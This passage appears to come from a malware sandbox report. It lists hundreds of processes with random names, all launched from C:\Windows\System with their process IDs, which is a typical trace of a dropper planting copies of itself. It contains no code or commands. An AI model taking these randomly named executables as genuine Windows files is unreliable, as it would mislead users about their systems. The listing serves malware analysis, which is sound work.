  C:\Windows\System\UpoGmHU.exe
  2⤵
  PID:8352
- C:\Windows\System\jiSNAvK.exe
  C:\Windows\System\jiSNAvK.exe
  2⤵
  PID:8372
- C:\Windows\System\EbIEwSr.exe
  C:\Windows\System\EbIEwSr.exe
  2⤵
  PID:8424
- C:\Windows\System\ePAkEjB.exe
  C:\Windows\System\ePAkEjB.exe
  2⤵
  PID:8440
- C:\Windows\System\rWvPQjH.exe
  C:\Windows\System\rWvPQjH.exe
  2⤵
  PID:8460
- C:\Windows\System\RuzVmAf.exe
  C:\Windows\System\RuzVmAf.exe
  2⤵
  PID:8488
- C:\Windows\System\IteRMwO.exe
  C:\Windows\System\IteRMwO.exe
  2⤵
  PID:8520
- C:\Windows\System\KDcuhsB.exe
  C:\Windows\System\KDcuhsB.exe
  2⤵
  PID:8544
- C:\Windows\System\qGUwqly.exe
  C:\Windows\System\qGUwqly.exe
  2⤵
  PID:8580
- C:\Windows\System\dNpHHNW.exe
  C:\Windows\System\dNpHHNW.exe
  2⤵
  PID:8600
- C:\Windows\System\bUdaADD.exe
  C:\Windows\System\bUdaADD.exe
  2⤵
  PID:8628
- C:\Windows\System\lVlOvsl.exe
  C:\Windows\System\lVlOvsl.exe
  2⤵
  PID:8656
- C:\Windows\System\iDIuTGg.exe
  C:\Windows\System\iDIuTGg.exe
  2⤵
  PID:8704
- C:\Windows\System\aHwgsno.exe
  C:\Windows\System\aHwgsno.exe
  2⤵
  PID:8720
- C:\Windows\System\cjXbTyn.exe
  C:\Windows\System\cjXbTyn.exe
  2⤵
  PID:8740
- C:\Windows\System\ZIAZxJH.exe
  C:\Windows\System\ZIAZxJH.exe
  2⤵
  PID:8788
- C:\Windows\System\JufxnsR.exe
  C:\Windows\System\JufxnsR.exe
  2⤵
  PID:8808
- C:\Windows\System\eSoajdD.exe
  C:\Windows\System\eSoajdD.exe
  2⤵
  PID:8832
- C:\Windows\System\SINLltu.exe
  C:\Windows\System\SINLltu.exe
  2⤵
  PID:8876
- C:\Windows\System\prRgDet.exe
  C:\Windows\System\prRgDet.exe
  2⤵
  PID:8892
- C:\Windows\System\ApXrLfx.exe
  C:\Windows\System\ApXrLfx.exe
  2⤵
  PID:8920
- C:\Windows\System\sXdYBSD.exe
  C:\Windows\System\sXdYBSD.exe
  2⤵
  PID:8948
- C:\Windows\System\vBTtfzI.exe
  C:\Windows\System\vBTtfzI.exe
  2⤵
  PID:8972
- C:\Windows\System\pMQemfi.exe
  C:\Windows\System\pMQemfi.exe
  2⤵
  PID:9004
- C:\Windows\System\eFLJBlm.exe
  C:\Windows\System\eFLJBlm.exe
  2⤵
  PID:9028
- C:\Windows\System\RagQpDW.exe
  C:\Windows\System\RagQpDW.exe
  2⤵
  PID:9076
- C:\Windows\System\AWtibrw.exe
  C:\Windows\System\AWtibrw.exe
  2⤵
  PID:9100
- C:\Windows\System\hwverkV.exe
  C:\Windows\System\hwverkV.exe
  2⤵
  PID:9124
- C:\Windows\System\DrPezIq.exe
  C:\Windows\System\DrPezIq.exe
  2⤵
  PID:9140
- C:\Windows\System\ZdHrrIn.exe
  C:\Windows\System\ZdHrrIn.exe
  2⤵
  PID:9160
- C:\Windows\System\RZQfSvH.exe
  C:\Windows\System\RZQfSvH.exe
  2⤵
  PID:9200
- C:\Windows\System\CKiNUpj.exe
  C:\Windows\System\CKiNUpj.exe
  2⤵
  PID:8228
- C:\Windows\System\UdQqdBM.exe
  C:\Windows\System\UdQqdBM.exe
  2⤵
  PID:8288
- C:\Windows\System\nYFiJjg.exe
  C:\Windows\System\nYFiJjg.exe
  2⤵
  PID:8368
- C:\Windows\System\UijqJWm.exe
  C:\Windows\System\UijqJWm.exe
  2⤵
  PID:8384
- C:\Windows\System\KnqtyLU.exe
  C:\Windows\System\KnqtyLU.exe
  2⤵
  PID:8468
- C:\Windows\System\gvoXMLR.exe
  C:\Windows\System\gvoXMLR.exe
  2⤵
  PID:8512
- C:\Windows\System\AsQVgdB.exe
  C:\Windows\System\AsQVgdB.exe
  2⤵
  PID:8536
- C:\Windows\System\jIjAmdX.exe
  C:\Windows\System\jIjAmdX.exe
  2⤵
  PID:8684
- C:\Windows\System\kQrXoJS.exe
  C:\Windows\System\kQrXoJS.exe
  2⤵
  PID:8728
- C:\Windows\System\GRSitTn.exe
  C:\Windows\System\GRSitTn.exe
  2⤵
  PID:8784
- C:\Windows\System\PIoGFkB.exe
  C:\Windows\System\PIoGFkB.exe
  2⤵
  PID:8828
- C:\Windows\System\xrIZgIZ.exe
  C:\Windows\System\xrIZgIZ.exe
  2⤵
  PID:8900
- C:\Windows\System\kKbbhBa.exe
  C:\Windows\System\kKbbhBa.exe
  2⤵
  PID:8964
- C:\Windows\System\WNACxOm.exe
  C:\Windows\System\WNACxOm.exe
  2⤵
  PID:9068
- C:\Windows\System\PboHcbL.exe
  C:\Windows\System\PboHcbL.exe
  2⤵
  PID:9132
- C:\Windows\System\cnDohEL.exe
  C:\Windows\System\cnDohEL.exe
  2⤵
  PID:9152
- C:\Windows\System\QXqVrUo.exe
  C:\Windows\System\QXqVrUo.exe
  2⤵
  PID:8248
- C:\Windows\System\BLyGzZC.exe
  C:\Windows\System\BLyGzZC.exe
  2⤵
  PID:8300
- C:\Windows\System\cfTtoNK.exe
  C:\Windows\System\cfTtoNK.exe
  2⤵
  PID:8576
- C:\Windows\System\GUUChai.exe
  C:\Windows\System\GUUChai.exe
  2⤵
  PID:8820
- C:\Windows\System\RHDDonl.exe
  C:\Windows\System\RHDDonl.exe
  2⤵
  PID:8800
- C:\Windows\System\asPdzPP.exe
  C:\Windows\System\asPdzPP.exe
  2⤵
  PID:9012
- C:\Windows\System\TbqwtdG.exe
  C:\Windows\System\TbqwtdG.exe
  2⤵
  PID:9108
- C:\Windows\System\SwGVsef.exe
  C:\Windows\System\SwGVsef.exe
  2⤵
  PID:8292
- C:\Windows\System\FJTTQSH.exe
  C:\Windows\System\FJTTQSH.exe
  2⤵
  PID:8864
- C:\Windows\System\bZeWntM.exe
  C:\Windows\System\bZeWntM.exe
  2⤵
  PID:8244
- C:\Windows\System\mGgRANW.exe
  C:\Windows\System\mGgRANW.exe
  2⤵
  PID:8532
- C:\Windows\System\GvhzWnc.exe
  C:\Windows\System\GvhzWnc.exe
  2⤵
  PID:8956
- C:\Windows\System\LGhaPPb.exe
  C:\Windows\System\LGhaPPb.exe
  2⤵
  PID:9224
- C:\Windows\System\gVDCAGQ.exe
  C:\Windows\System\gVDCAGQ.exe
  2⤵
  PID:9248
- C:\Windows\System\ogpZbyJ.exe
  C:\Windows\System\ogpZbyJ.exe
  2⤵
  PID:9280
- C:\Windows\System\viJhpjE.exe
  C:\Windows\System\viJhpjE.exe
  2⤵
  PID:9316
- C:\Windows\System\EIRZcMa.exe
  C:\Windows\System\EIRZcMa.exe
  2⤵
  PID:9344
- C:\Windows\System\PijBunA.exe
  C:\Windows\System\PijBunA.exe
  2⤵
  PID:9408
- C:\Windows\System\PtJtbXB.exe
  C:\Windows\System\PtJtbXB.exe
  2⤵
  PID:9428
- C:\Windows\System\VOoQsys.exe
  C:\Windows\System\VOoQsys.exe
  2⤵
  PID:9444
- C:\Windows\System\lOsdNAM.exe
  C:\Windows\System\lOsdNAM.exe
  2⤵
  PID:9468
- C:\Windows\System\zgcKamw.exe
  C:\Windows\System\zgcKamw.exe
  2⤵
  PID:9488
- C:\Windows\System\ozvirwq.exe
  C:\Windows\System\ozvirwq.exe
  2⤵
  PID:9528
- C:\Windows\System\fZNlNXF.exe
  C:\Windows\System\fZNlNXF.exe
  2⤵
  PID:9568
- C:\Windows\System\olBrItj.exe
  C:\Windows\System\olBrItj.exe
  2⤵
  PID:9588
- C:\Windows\System\GcGZhMm.exe
  C:\Windows\System\GcGZhMm.exe
  2⤵
  PID:9648
- C:\Windows\System\XTWkKZT.exe
  C:\Windows\System\XTWkKZT.exe
  2⤵
  PID:9700
- C:\Windows\System\McXvqpf.exe
  C:\Windows\System\McXvqpf.exe
  2⤵
  PID:9716
- C:\Windows\System\lcUuOua.exe
  C:\Windows\System\lcUuOua.exe
  2⤵
  PID:9732
- C:\Windows\System\HajBprI.exe
  C:\Windows\System\HajBprI.exe
  2⤵
  PID:9748
- C:\Windows\System\JVdqBpJ.exe
  C:\Windows\System\JVdqBpJ.exe
  2⤵
  PID:9764
- C:\Windows\System\xOGpNra.exe
  C:\Windows\System\xOGpNra.exe
  2⤵
  PID:9780
- C:\Windows\System\cEWnCuP.exe
  C:\Windows\System\cEWnCuP.exe
  2⤵
  PID:9796
- C:\Windows\System\mvMSsPA.exe
  C:\Windows\System\mvMSsPA.exe
  2⤵
  PID:9824
- C:\Windows\System\Irqtwvx.exe
  C:\Windows\System\Irqtwvx.exe
  2⤵
  PID:9876
- C:\Windows\System\OBsJMxb.exe
  C:\Windows\System\OBsJMxb.exe
  2⤵
  PID:9892
- C:\Windows\System\GsAaqHL.exe
  C:\Windows\System\GsAaqHL.exe
  2⤵
  PID:9912
- C:\Windows\System\kCWNPDd.exe
  C:\Windows\System\kCWNPDd.exe
  2⤵
  PID:9932
- C:\Windows\System\VtHlndt.exe
  C:\Windows\System\VtHlndt.exe
  2⤵
  PID:9964
- C:\Windows\System\fLppLci.exe
  C:\Windows\System\fLppLci.exe
  2⤵
  PID:10092
- C:\Windows\System\oYnNWoW.exe
  C:\Windows\System\oYnNWoW.exe
  2⤵
  PID:10128
- C:\Windows\System\XrCRMOI.exe
  C:\Windows\System\XrCRMOI.exe
  2⤵
  PID:10188
- C:\Windows\System\ODpGzKH.exe
  C:\Windows\System\ODpGzKH.exe
  2⤵
  PID:10204
- C:\Windows\System\dgTqhZC.exe
  C:\Windows\System\dgTqhZC.exe
  2⤵
  PID:8680
- C:\Windows\System\yHIuIlm.exe
  C:\Windows\System\yHIuIlm.exe
  2⤵
  PID:9268
- C:\Windows\System\dggbavU.exe
  C:\Windows\System\dggbavU.exe
  2⤵
  PID:9364
- C:\Windows\System\OJsjumj.exe
  C:\Windows\System\OJsjumj.exe
  2⤵
  PID:9396
- C:\Windows\System\BtDpPHq.exe
  C:\Windows\System\BtDpPHq.exe
  2⤵
  PID:9460
- C:\Windows\System\wfFMOtZ.exe
  C:\Windows\System\wfFMOtZ.exe
  2⤵
  PID:9564
- C:\Windows\System\kdthmWo.exe
  C:\Windows\System\kdthmWo.exe
  2⤵
  PID:9640
- C:\Windows\System\djUWeEk.exe
  C:\Windows\System\djUWeEk.exe
  2⤵
  PID:9628
- C:\Windows\System\DeXIgMK.exe
  C:\Windows\System\DeXIgMK.exe
  2⤵
  PID:9840
- C:\Windows\System\bseLrvM.exe
  C:\Windows\System\bseLrvM.exe
  2⤵
  PID:9884
- C:\Windows\System\clkWLrb.exe
  C:\Windows\System\clkWLrb.exe
  2⤵
  PID:9724
- C:\Windows\System\NULqetQ.exe
  C:\Windows\System\NULqetQ.exe
  2⤵
  PID:9684
- C:\Windows\System\XXuRSuW.exe
  C:\Windows\System\XXuRSuW.exe
  2⤵
  PID:9872
- C:\Windows\System\FcCbqOs.exe
  C:\Windows\System\FcCbqOs.exe
  2⤵
  PID:9920
- C:\Windows\System\QEVMzdA.exe
  C:\Windows\System\QEVMzdA.exe
  2⤵
  PID:9708
- C:\Windows\System\VwXOkUB.exe
  C:\Windows\System\VwXOkUB.exe
  2⤵
  PID:10100
- C:\Windows\System\eGRenRp.exe
  C:\Windows\System\eGRenRp.exe
  2⤵
  PID:10048
- C:\Windows\System\EsxaeHP.exe
  C:\Windows\System\EsxaeHP.exe
  2⤵
  PID:10212
- C:\Windows\System\SbtLXfp.exe
  C:\Windows\System\SbtLXfp.exe
  2⤵
  PID:10152
- C:\Windows\System\UKVKMnd.exe
  C:\Windows\System\UKVKMnd.exe
  2⤵
  PID:8764
- C:\Windows\System\BAYVfIU.exe
  C:\Windows\System\BAYVfIU.exe
  2⤵
  PID:9424
- C:\Windows\System\MbAPiJV.exe
  C:\Windows\System\MbAPiJV.exe
  2⤵
  PID:9832
- C:\Windows\System\yXCJaoQ.exe
  C:\Windows\System\yXCJaoQ.exe
  2⤵
  PID:9608
- C:\Windows\System\HQhNHXV.exe
  C:\Windows\System\HQhNHXV.exe
  2⤵
  PID:9788
- C:\Windows\System\oxIWXAi.exe
  C:\Windows\System\oxIWXAi.exe
  2⤵
  PID:9636
- C:\Windows\System\MtovTGR.exe
  C:\Windows\System\MtovTGR.exe
  2⤵
  PID:10020
- C:\Windows\System\EFCjxcA.exe
  C:\Windows\System\EFCjxcA.exe
  2⤵
  PID:10176
- C:\Windows\System\VMTxsYY.exe
  C:\Windows\System\VMTxsYY.exe
  2⤵
  PID:9244
- C:\Windows\System\TzlttQG.exe
  C:\Windows\System\TzlttQG.exe
  2⤵
  PID:9576
- C:\Windows\System\fXQdUzn.exe
  C:\Windows\System\fXQdUzn.exe
  2⤵
  PID:9712
- C:\Windows\System\SQfYRos.exe
  C:\Windows\System\SQfYRos.exe
  2⤵
  PID:8732
- C:\Windows\System\eGPZCHC.exe
  C:\Windows\System\eGPZCHC.exe
  2⤵
  PID:9416
- C:\Windows\System\vVeCoSR.exe
  C:\Windows\System\vVeCoSR.exe
  2⤵
  PID:10272
- C:\Windows\System\gcxGWgv.exe
  C:\Windows\System\gcxGWgv.exe
  2⤵
  PID:10292
- C:\Windows\System\xBGBXLB.exe
  C:\Windows\System\xBGBXLB.exe
  2⤵
  PID:10312
- C:\Windows\System\rsqLGSj.exe
  C:\Windows\System\rsqLGSj.exe
  2⤵
  PID:10356
- C:\Windows\System\yAdDyGV.exe
  C:\Windows\System\yAdDyGV.exe
  2⤵
  PID:10396
- C:\Windows\System\fZEcnxI.exe
  C:\Windows\System\fZEcnxI.exe
  2⤵
  PID:10416
- C:\Windows\System\XtjLoYw.exe
  C:\Windows\System\XtjLoYw.exe
  2⤵
  PID:10440
- C:\Windows\System\PPIqCVR.exe
  C:\Windows\System\PPIqCVR.exe
  2⤵
  PID:10456
- C:\Windows\System\fXdcSee.exe
  C:\Windows\System\fXdcSee.exe
  2⤵
  PID:10484
- C:\Windows\System\coFwEWK.exe
  C:\Windows\System\coFwEWK.exe
  2⤵
  PID:10536
- C:\Windows\System\BuMSkbe.exe
  C:\Windows\System\BuMSkbe.exe
  2⤵
  PID:10560
- C:\Windows\System\legqdwB.exe
  C:\Windows\System\legqdwB.exe
  2⤵
  PID:10580
- C:\Windows\System\cQlXntu.exe
  C:\Windows\System\cQlXntu.exe
  2⤵
  PID:10616
- C:\Windows\System\FvOefYE.exe
  C:\Windows\System\FvOefYE.exe
  2⤵
  PID:10632
- C:\Windows\System\zladrUy.exe
  C:\Windows\System\zladrUy.exe
  2⤵
  PID:10656
- C:\Windows\System\QlnfVwi.exe
  C:\Windows\System\QlnfVwi.exe
  2⤵
  PID:10672
- C:\Windows\System\SKeHXKP.exe
  C:\Windows\System\SKeHXKP.exe
  2⤵
  PID:10696
- C:\Windows\System\JFBQFoL.exe
  C:\Windows\System\JFBQFoL.exe
  2⤵
  PID:10736
- C:\Windows\System\HeJZoEt.exe
  C:\Windows\System\HeJZoEt.exe
  2⤵
  PID:10784
- C:\Windows\System\gNYDAPN.exe
  C:\Windows\System\gNYDAPN.exe
  2⤵
  PID:10804
- C:\Windows\System\hmAlYuK.exe
  C:\Windows\System\hmAlYuK.exe
  2⤵
  PID:10824
- C:\Windows\System\dYwioFV.exe
  C:\Windows\System\dYwioFV.exe
  2⤵
  PID:10848
- C:\Windows\System\TLHJETr.exe
  C:\Windows\System\TLHJETr.exe
  2⤵
  PID:10896
- C:\Windows\System\dFnhyex.exe
  C:\Windows\System\dFnhyex.exe
  2⤵
  PID:10916
- C:\Windows\System\eUNWJJp.exe
  C:\Windows\System\eUNWJJp.exe
  2⤵
  PID:10960
- C:\Windows\System\AvpIBlp.exe
  C:\Windows\System\AvpIBlp.exe
  2⤵
  PID:10980
- C:\Windows\System\AehELSH.exe
  C:\Windows\System\AehELSH.exe
  2⤵
  PID:11004
- C:\Windows\System\GUPSPwT.exe
  C:\Windows\System\GUPSPwT.exe
  2⤵
  PID:11052
- C:\Windows\System\KOwJrju.exe
  C:\Windows\System\KOwJrju.exe
  2⤵
  PID:11076
- C:\Windows\System\WMWOCAl.exe
  C:\Windows\System\WMWOCAl.exe
  2⤵
  PID:11092
- C:\Windows\System\gvrlyIt.exe
  C:\Windows\System\gvrlyIt.exe
  2⤵
  PID:11108
- C:\Windows\System\xtiZRXL.exe
  C:\Windows\System\xtiZRXL.exe
  2⤵
  PID:11128
- C:\Windows\System\CJXulIf.exe
  C:\Windows\System\CJXulIf.exe
  2⤵
  PID:11160
- C:\Windows\System\DoHVcpe.exe
  C:\Windows\System\DoHVcpe.exe
  2⤵
  PID:11180
- C:\Windows\System\WGNxBDM.exe
  C:\Windows\System\WGNxBDM.exe
  2⤵
  PID:11208
- C:\Windows\System\fOKpEUf.exe
  C:\Windows\System\fOKpEUf.exe
  2⤵
  PID:11228
- C:\Windows\System\zMpltYC.exe
  C:\Windows\System\zMpltYC.exe
  2⤵
  PID:10248
- C:\Windows\System\tkcpAjM.exe
  C:\Windows\System\tkcpAjM.exe
  2⤵
  PID:10304
- C:\Windows\System\JjQbdew.exe
  C:\Windows\System\JjQbdew.exe
  2⤵
  PID:10348
- C:\Windows\System\JSuEobJ.exe
  C:\Windows\System\JSuEobJ.exe
  2⤵
  PID:10412
- C:\Windows\System\gJRNSmZ.exe
  C:\Windows\System\gJRNSmZ.exe
  2⤵
  PID:10448
- C:\Windows\System\JWJUCac.exe
  C:\Windows\System\JWJUCac.exe
  2⤵
  PID:10516
- C:\Windows\System\jXLestu.exe
  C:\Windows\System\jXLestu.exe
  2⤵
  PID:10648
- C:\Windows\System\NWzVSVH.exe
  C:\Windows\System\NWzVSVH.exe
  2⤵
  PID:10684
- C:\Windows\System\CDGjuoU.exe
  C:\Windows\System\CDGjuoU.exe
  2⤵
  PID:10792
- C:\Windows\System\akgQaIP.exe
  C:\Windows\System\akgQaIP.exe
  2⤵
  PID:10864
- C:\Windows\System\XqqyIqu.exe
  C:\Windows\System\XqqyIqu.exe
  2⤵
  PID:10932
- C:\Windows\System\BASDgNH.exe
  C:\Windows\System\BASDgNH.exe
  2⤵
  PID:10992
- C:\Windows\System\UTzuZnV.exe
  C:\Windows\System\UTzuZnV.exe
  2⤵
  PID:9668
- C:\Windows\System\YrEYSZY.exe
  C:\Windows\System\YrEYSZY.exe
  2⤵
  PID:11068
- C:\Windows\System\SoNlWeZ.exe
  C:\Windows\System\SoNlWeZ.exe
  2⤵
  PID:11120
- C:\Windows\System\FrJRPnj.exe
  C:\Windows\System\FrJRPnj.exe
  2⤵
  PID:11168
- C:\Windows\System\AqgrDWP.exe
  C:\Windows\System\AqgrDWP.exe
  2⤵
  PID:9692
- C:\Windows\System\bDKSHtX.exe
  C:\Windows\System\bDKSHtX.exe
  2⤵
  PID:11252
- C:\Windows\System\wOkALUP.exe
  C:\Windows\System\wOkALUP.exe
  2⤵
  PID:9868
- C:\Windows\System\hOaWDYh.exe
  C:\Windows\System\hOaWDYh.exe
  2⤵
  PID:10724
- C:\Windows\System\jdZtHDB.exe
  C:\Windows\System\jdZtHDB.exe
  2⤵
  PID:10764
- C:\Windows\System\BpxOkuI.exe
  C:\Windows\System\BpxOkuI.exe
  2⤵
  PID:10956
- C:\Windows\System\lmJPLIz.exe
  C:\Windows\System\lmJPLIz.exe
  2⤵
  PID:3460
- C:\Windows\System\neyJqXF.exe
  C:\Windows\System\neyJqXF.exe
  2⤵
  PID:11152
- C:\Windows\System\AtLaEgH.exe
  C:\Windows\System\AtLaEgH.exe
  2⤵
  PID:9308
- C:\Windows\System\gRhwxyA.exe
  C:\Windows\System\gRhwxyA.exe
  2⤵
  PID:10476
- C:\Windows\System\BZxhXsz.exe
  C:\Windows\System\BZxhXsz.exe
  2⤵
  PID:10812
- C:\Windows\System\dWhOdnV.exe
  C:\Windows\System\dWhOdnV.exe
  2⤵
  PID:2064
- C:\Windows\System\BEZFOli.exe
  C:\Windows\System\BEZFOli.exe
  2⤵
  PID:10644
- C:\Windows\System\uovJzJf.exe
  C:\Windows\System\uovJzJf.exe
  2⤵
  PID:11220
- C:\Windows\System\ptEWzXv.exe
  C:\Windows\System\ptEWzXv.exe
  2⤵
  PID:11268
- C:\Windows\System\GzdLLfY.exe
  C:\Windows\System\GzdLLfY.exe
  2⤵
  PID:11308
- C:\Windows\System\gCqdMiB.exe
  C:\Windows\System\gCqdMiB.exe
  2⤵
  PID:11324
- C:\Windows\System\KzPdEpU.exe
  C:\Windows\System\KzPdEpU.exe
  2⤵
  PID:11348
- C:\Windows\System\IitJdNr.exe
  C:\Windows\System\IitJdNr.exe
  2⤵
  PID:11380
- C:\Windows\System\kOKkjNQ.exe
  C:\Windows\System\kOKkjNQ.exe
  2⤵
  PID:11400
- C:\Windows\System\GXUTzWH.exe
  C:\Windows\System\GXUTzWH.exe
  2⤵
  PID:11448
- C:\Windows\System\VIpnDsf.exe
  C:\Windows\System\VIpnDsf.exe
  2⤵
  PID:11468
- C:\Windows\System\hkvDXeq.exe
  C:\Windows\System\hkvDXeq.exe
  2⤵
  PID:11512
- C:\Windows\System\ezYprgn.exe
  C:\Windows\System\ezYprgn.exe
  2⤵
  PID:11536
- C:\Windows\System\cbkJypg.exe
  C:\Windows\System\cbkJypg.exe
  2⤵
  PID:11560
- C:\Windows\System\kteRWyd.exe
  C:\Windows\System\kteRWyd.exe
  2⤵
  PID:11580
- C:\Windows\System\NnwETPJ.exe
  C:\Windows\System\NnwETPJ.exe
  2⤵
  PID:11604
- C:\Windows\System\fzHSRIj.exe
  C:\Windows\System\fzHSRIj.exe
  2⤵
  PID:11620
- C:\Windows\System\JaMjKIX.exe
  C:\Windows\System\JaMjKIX.exe
  2⤵
  PID:11684
- C:\Windows\System\FjLOWKo.exe
  C:\Windows\System\FjLOWKo.exe
  2⤵
  PID:11728
- C:\Windows\System\uGUBLmM.exe
  C:\Windows\System\uGUBLmM.exe
  2⤵
  PID:11752
- C:\Windows\System\nPAvyqA.exe
  C:\Windows\System\nPAvyqA.exe
  2⤵
  PID:11768
- C:\Windows\System\AuPpLAk.exe
  C:\Windows\System\AuPpLAk.exe
  2⤵
  PID:11788
- C:\Windows\System\VYyKGqE.exe
  C:\Windows\System\VYyKGqE.exe
  2⤵
  PID:11804
- C:\Windows\System\plTfzfB.exe
  C:\Windows\System\plTfzfB.exe
  2⤵
  PID:11832
- C:\Windows\System\ljIDwQO.exe
  C:\Windows\System\ljIDwQO.exe
  2⤵
  PID:11848
- C:\Windows\System\blDrdVy.exe
  C:\Windows\System\blDrdVy.exe
  2⤵
  PID:11880
- C:\Windows\System\SggYeKf.exe
  C:\Windows\System\SggYeKf.exe
  2⤵
  PID:11940
- C:\Windows\System\OYHcYmC.exe
  C:\Windows\System\OYHcYmC.exe
  2⤵
  PID:11972
- C:\Windows\System\dqhyHDQ.exe
  C:\Windows\System\dqhyHDQ.exe
  2⤵
  PID:11992
- C:\Windows\System\ooujAkY.exe
  C:\Windows\System\ooujAkY.exe
  2⤵
  PID:12016
- C:\Windows\System\mowIbzR.exe
  C:\Windows\System\mowIbzR.exe
  2⤵
  PID:12040
- C:\Windows\System\qGeEnZy.exe
  C:\Windows\System\qGeEnZy.exe
  2⤵
  PID:12088
- C:\Windows\System\gwmMImI.exe
  C:\Windows\System\gwmMImI.exe
  2⤵
  PID:12120
- C:\Windows\System\nnNgQDb.exe
  C:\Windows\System\nnNgQDb.exe
  2⤵
  PID:12140
- C:\Windows\System\VgMMfiW.exe
  C:\Windows\System\VgMMfiW.exe
  2⤵
  PID:12168
- C:\Windows\System\BMRAKOF.exe
  C:\Windows\System\BMRAKOF.exe
  2⤵
  PID:12208
- C:\Windows\System\YWVjtWn.exe
  C:\Windows\System\YWVjtWn.exe
  2⤵
  PID:12232
- C:\Windows\System\scDecMp.exe
  C:\Windows\System\scDecMp.exe
  2⤵
  PID:12248
- C:\Windows\System\BlmSyYM.exe
  C:\Windows\System\BlmSyYM.exe
  2⤵
  PID:12276
- C:\Windows\System\avFEQTT.exe
  C:\Windows\System\avFEQTT.exe
  2⤵
  PID:11172
- C:\Windows\System\AJcqCEk.exe
  C:\Windows\System\AJcqCEk.exe
  2⤵
  PID:11296
- C:\Windows\System\NRptCJQ.exe
  C:\Windows\System\NRptCJQ.exe
  2⤵
  PID:11392
- C:\Windows\System\DrJVDGD.exe
  C:\Windows\System\DrJVDGD.exe
  2⤵
  PID:1444
- C:\Windows\System\JpjAdJP.exe
  C:\Windows\System\JpjAdJP.exe
  2⤵
  PID:11544
- C:\Windows\System\LLtYdFR.exe
  C:\Windows\System\LLtYdFR.exe
  2⤵
  PID:11636
- C:\Windows\System\zGkanpz.exe
  C:\Windows\System\zGkanpz.exe
  2⤵
  PID:11676
- C:\Windows\System\swCaGlX.exe
  C:\Windows\System\swCaGlX.exe
  2⤵
  PID:11764
- C:\Windows\System\zZgzfUj.exe
  C:\Windows\System\zZgzfUj.exe
  2⤵
  PID:11784
- C:\Windows\System\UcotsZm.exe
  C:\Windows\System\UcotsZm.exe
  2⤵
  PID:11776
- C:\Windows\System\rCoVipZ.exe
  C:\Windows\System\rCoVipZ.exe
  2⤵
  PID:11840
- C:\Windows\System\dZdigHM.exe
  C:\Windows\System\dZdigHM.exe
  2⤵
  PID:11936
- C:\Windows\System\YuhZGrr.exe
  C:\Windows\System\YuhZGrr.exe
  2⤵
  PID:12008
- C:\Windows\System\GXWGkTE.exe
  C:\Windows\System\GXWGkTE.exe
  2⤵
  PID:12032
- C:\Windows\System\CokvCec.exe
  C:\Windows\System\CokvCec.exe
  2⤵
  PID:12132
- C:\Windows\System\AoDHTcT.exe
  C:\Windows\System\AoDHTcT.exe
  2⤵
  PID:12160
- C:\Windows\System\WTTmPkZ.exe
  C:\Windows\System\WTTmPkZ.exe
  2⤵
  PID:12200
- C:\Windows\System\GMTcEfM.exe
  C:\Windows\System\GMTcEfM.exe
  2⤵
  PID:12268
- C:\Windows\System\GgRrupo.exe
  C:\Windows\System\GgRrupo.exe
  2⤵
  PID:11408
- C:\Windows\System\hQBslWo.exe
  C:\Windows\System\hQBslWo.exe
  2⤵
  PID:4180
- C:\Windows\System\MHXUjuj.exe
  C:\Windows\System\MHXUjuj.exe
  2⤵
  PID:11736
- C:\Windows\System\NPeVqaO.exe
  C:\Windows\System\NPeVqaO.exe
  2⤵
  PID:11744
- C:\Windows\System\rwdsffq.exe
  C:\Windows\System\rwdsffq.exe
  2⤵
  PID:11968
- C:\Windows\System\vTNROjT.exe
  C:\Windows\System\vTNROjT.exe
  2⤵
  PID:11964
- C:\Windows\System\BggWrIe.exe
  C:\Windows\System\BggWrIe.exe
  2⤵
  PID:12188
- C:\Windows\System\ySrMkVM.exe
  C:\Windows\System\ySrMkVM.exe
  2⤵
  PID:12112
- C:\Windows\System\OquPSQX.exe
  C:\Windows\System\OquPSQX.exe
  2⤵
  PID:11332
- C:\Windows\System\QDqPzuS.exe
  C:\Windows\System\QDqPzuS.exe
  2⤵
  PID:4300
- C:\Windows\System\MQmzkRY.exe
  C:\Windows\System\MQmzkRY.exe
  2⤵
  PID:11372
- C:\Windows\System\mUWKzvK.exe
  C:\Windows\System\mUWKzvK.exe
  2⤵
  PID:11980
- C:\Windows\System\EQWtXBm.exe
  C:\Windows\System\EQWtXBm.exe
  2⤵
  PID:11868
- C:\Windows\System\rwpvJuR.exe
  C:\Windows\System\rwpvJuR.exe
  2⤵
  PID:12304
- C:\Windows\System\NaFxlGu.exe
  C:\Windows\System\NaFxlGu.exe
  2⤵
  PID:12328
- C:\Windows\System\NBMbvAz.exe
  C:\Windows\System\NBMbvAz.exe
  2⤵
  PID:12360
- C:\Windows\System\pEQBPKY.exe
  C:\Windows\System\pEQBPKY.exe
  2⤵
  PID:12408
- C:\Windows\System\VFWpXJx.exe
  C:\Windows\System\VFWpXJx.exe
  2⤵
  PID:12436
- C:\Windows\System\IOOJmLM.exe
  C:\Windows\System\IOOJmLM.exe
  2⤵
  PID:12456
- C:\Windows\System\MqIHbod.exe
  C:\Windows\System\MqIHbod.exe
  2⤵
  PID:12488
- C:\Windows\System\brrolik.exe
  C:\Windows\System\brrolik.exe
  2⤵
  PID:12580
- C:\Windows\System\KTOSTel.exe
  C:\Windows\System\KTOSTel.exe
  2⤵
  PID:12600
- C:\Windows\System\PsXeZPD.exe
  C:\Windows\System\PsXeZPD.exe
  2⤵
  PID:12656
- C:\Windows\System\qRbLGnF.exe
  C:\Windows\System\qRbLGnF.exe
  2⤵
  PID:12680
- C:\Windows\System\QETRsOj.exe
  C:\Windows\System\QETRsOj.exe
  2⤵
  PID:12736
- C:\Windows\System\LwjzlAB.exe
  C:\Windows\System\LwjzlAB.exe
  2⤵
  PID:12756
- C:\Windows\System\TORviOx.exe
  C:\Windows\System\TORviOx.exe
  2⤵
  PID:12796
- C:\Windows\System\TLaKXUT.exe
  C:\Windows\System\TLaKXUT.exe
  2⤵
  PID:12820
- C:\Windows\System\RFxDzrj.exe
  C:\Windows\System\RFxDzrj.exe
  2⤵
  PID:12840
- C:\Windows\System\ItHrtJF.exe
  C:\Windows\System\ItHrtJF.exe
  2⤵
  PID:12864
- C:\Windows\System\LJxsYTX.exe
  C:\Windows\System\LJxsYTX.exe
  2⤵
  PID:12884
- C:\Windows\System\rtxJXMS.exe
  C:\Windows\System\rtxJXMS.exe
  2⤵
  PID:12904
- C:\Windows\System\IojnLxW.exe
  C:\Windows\System\IojnLxW.exe
  2⤵
  PID:12960
- C:\Windows\System\dgQwxoU.exe
  C:\Windows\System\dgQwxoU.exe
  2⤵
  PID:12980
- C:\Windows\System\LFNuORv.exe
  C:\Windows\System\LFNuORv.exe
  2⤵
